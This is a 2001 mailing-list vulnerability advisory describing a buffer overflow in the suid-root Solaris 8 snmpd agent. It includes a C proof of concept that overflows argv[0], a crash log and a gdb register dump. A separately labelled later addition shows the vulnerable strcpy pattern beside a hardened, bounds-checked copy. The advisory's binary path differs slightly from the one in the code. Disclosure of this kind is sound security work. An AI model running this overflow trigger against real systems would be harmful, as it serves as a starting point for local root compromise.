From: Pablo Sor (psorAFIP.GOV.AR)
Date: Tue Mar 13 2001 - 05:34:40 CST


    Description

    The /opt/SUNWssp/snmpd command (SNMP proxy agent) is suid root
    and contains a buffer overflow. The problem occurs when it copies its own
    name (argv[0]) into an internal variable without checking its length,
    and this causes the overflow.

    Vulnerable Version

    Sun Solaris 5.8

    Technical Description

    -----------------------------------------------------

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    /* Execs snmpd with an argv[0] of the requested length, filled with 'A'. */
    int main(int argc, char **argv)
    {
        char *buf;
        int len = (argc > 1) ? atoi(argv[1]) : 0;
        if (len < 1 || (buf = (char *) malloc(len)) == NULL)
            return 1;                      /* need a positive length and memory */
        memset(buf, 0x41, len - 1);        /* fill with 'A' (0x41) */
        buf[len - 1] = 0;                  /* NUL-terminate */
        execl("/opt/SUNWssp/bin/snmpd", buf, (char *) 0);
        perror("execl");                   /* reached only if exec fails */
        return 1;
    }

    -----------------------------------------------------
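    As an added illustration (not code from the original post or from Sun), the unchecked copy pattern the description attributes to snmpd is shown beside a bounded version that rejects an argv[0] that does not fit its buffer; the 256-byte buffer size and the function names are assumptions, since the post states neither.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size of the agent's internal name buffer; the post does not state it. */
#define NAME_BUF_SZ 256

/* The pattern described in the post: argv[0] copied by strcpy() into a
   fixed-size buffer with no length check. A name of NAME_BUF_SZ bytes or
   more runs past the buffer (the 0x41414141 values in the saved registers
   are the 'A' bytes that spilled). Shown for comparison only; never called. */
void vulnerable_set_name(char name[NAME_BUF_SZ], const char *argv0)
{
    strcpy(name, argv0);
}

/* Hardened form: bounded scan, refuse anything that does not fit together
   with its terminator, never write past name_sz. Returns 0 on success, -1 on reject. */
int safe_set_name(char *name, size_t name_sz, const char *argv0)
{
    size_t len = 0;
    if (argv0 == NULL || name_sz == 0)
        return -1;
    while (len < name_sz && argv0[len] != '\0')   /* stop at name_sz, not only at NUL */
        len++;
    if (len >= name_sz)                            /* no room for the terminator */
        return -1;
    memcpy(name, argv0, len + 1);                  /* includes the NUL */
    return 0;
}

/* Repeats the post's test with a constructed name of name_len 'A' bytes.
   Returns 1 if the hardened copier rejects it, 0 if it accepts it. */
int rejects_name_of_length(size_t name_len)
{
    static char argv0[4096];
    char name[NAME_BUF_SZ];
    if (name_len >= sizeof argv0)
        return 0;
    memset(argv0, 'A', name_len);
    argv0[name_len] = '\0';
    return safe_set_name(name, sizeof name, argv0) == -1;
}

int main(void)
{
    char name[NAME_BUF_SZ];
    printf("\"snmpd\" accepted: %d\n", safe_set_name(name, sizeof name, "snmpd") == 0);
    printf("700-byte name rejected: %d\n", rejects_name_of_length(700));
    return 0;
}
```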

    $ uname -a
    SunOS tomy 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10

    $ ./snmpd-demo 700
    Segmentation Fault (core dumped)

    $ gdb ./snmpd-demo --core=core

    [..]

    Program received signal SIGSEGV, Segmentation fault.
    0xfee32b58 in strcpy () from /usr/lib/libc.so.1
    (gdb) info registers
    g0 0x0 0
    g1 0x78000 491520
    g2 0xff22579c -14526564
    g3 0xff162d78 -15323784
    g4 0x0 0
    g5 0x0 0
    g6 0x0 0
    g7 0x76f98 487320
    o0 0x2c1 705
    o1 0xffbed9b9 -4269639
    o2 0x2c1 705
    o3 0x41 65
    o4 0xffbed180 -4271744
    o5 0xff26a147 -14245561
    sp 0xffbed658 -4270504
    o7 0xfee83650 -18336176
    l0 0x7efefeff 2130640639
    l1 0x81010100 -2130640640
    l2 0xff000000 -16777216
    l3 0xff0000 16711680
    l4 0xff00 65280
    l5 0x0 0
    l6 0x0 0
    l7 0x0 0
    i0 0x41414141 1094795585 ;;;;;
    i1 0xffbed6fc -4270340 ; pointer to argv[0]
    i2 0x41414141 1094795585 ;;;;;
    i3 0x41414141 1094795585 ;;;;;
    i4 0x81010100 -2130640640
    i5 0xff00 65280
    fp 0xffbed698 -4270440
    i7 0xff265474 -14265228
    y 0x6 6
    psr 0xfe001000 -33550336
    wim 0x0 0
    tbr 0x0 0
    pc 0xfee32b58 -18666664
    npc 0xfee32b5c -18666660
    fpsr 0x0 0
    cpsr 0x0 0

    (gdb) x/20x $i1
    0xffbed6fc: 0x41414141 0x41414141 0x41414141 0x41414141
    0xffbed70c: 0x41414141 0x41414141 0x41414141 0x41414141
    0xffbed71c: 0x41414141 0x41414141 0x41414141 0x41414141
    0xffbed72c: 0x41414141 0x41414141 0x41414141 0x41414141
    0xffbed73c: 0x41414141 0x41414141 0x41414141 0x41414141

    Pablo Sor
    psorafip.gov.ar